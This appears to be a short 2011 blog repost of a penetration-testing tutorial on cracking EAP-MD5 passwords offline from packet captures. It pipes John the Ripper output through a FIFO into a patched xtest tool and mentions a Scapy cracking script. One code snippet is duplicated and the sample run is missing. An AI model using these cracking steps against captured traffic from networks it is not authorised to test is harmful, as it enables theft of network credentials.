Apr 27, 2011

EAP-MD5 Offline password attacks


If you want to get the script and read all detail of this article, please go to the Source.

1. Make FIFO
root@bt:/pentest/passwords/jtr# mknod pwque p


2.  Create words list.
root@bt:/pentest/passwords/jtr# ./john -i:ALL --stdout > pwque &

3.  Crack it.

root@bt:/pentest/passwords/jtr# ~/xtest-1.0/xtest -w ./pwque -c ~/xtest-1.0/sample-pcaps/7971G-EAP_Success.pcap


/* Calculate Total Number of passwords for attack */
while( fgets(passwd, sizeof(passwd), in_file) != NULL ) {
wordcount++;
}
rewind(in_file);
printf("[+] Attempting Dictionary Attack with %d passwords of the dictionary %s\n",wordcount,dictFile);

while( fgets(passwd, sizeof(passwd), in_file) != NULL ) {
wordcount++;
}
rewind(in_file);
printf("[+] Attempting Dictionary Attack with %d passwords of the dictionary %s\n",wordcount,dictFile);


This loop reads the password file until it reaches the end and prints how many passwords it counted in the file. Then it does a "rewind" to start back at the beginning of the file with its guessing. That doesn't work if you are brute forcing something and there is no end to of file. Remove ALL those lines of code and recompile so you can use the FIFO file object to brute force as input. After making that change the commands above works properly.   (Note:  Alternatively, you can use Josh's patch.  Josh Wright was nice enough to email me his xtest patch.  You can download it here: xtest-stdin-warnfix.diff )
xtest can do more than just brute-force a EAP-MD5 hash in a packet capture and I kind of like having my password count in my output (the code we removed).  Tim said, "I bet SCAPY would make writing an EAP-MD5 brute-force pretty simple". He was right. With SCAPY parsing packets is trivial. Writing an EAP-MD5 brute-force tool only requires a few lines of code.
Submitted for your approval: eapmd5crack.py
The tools accepts a packet capture containing an EAP-MD5 challenge and response and does a dictionary attack to determine the password. You can also use a FIFO queue to brute-force passwords with JTR.


Here is a sample run using a dictionary:





Source: http://pauldotcom.com/2011/04/eap-md5-offline-password-attac.html

No comments: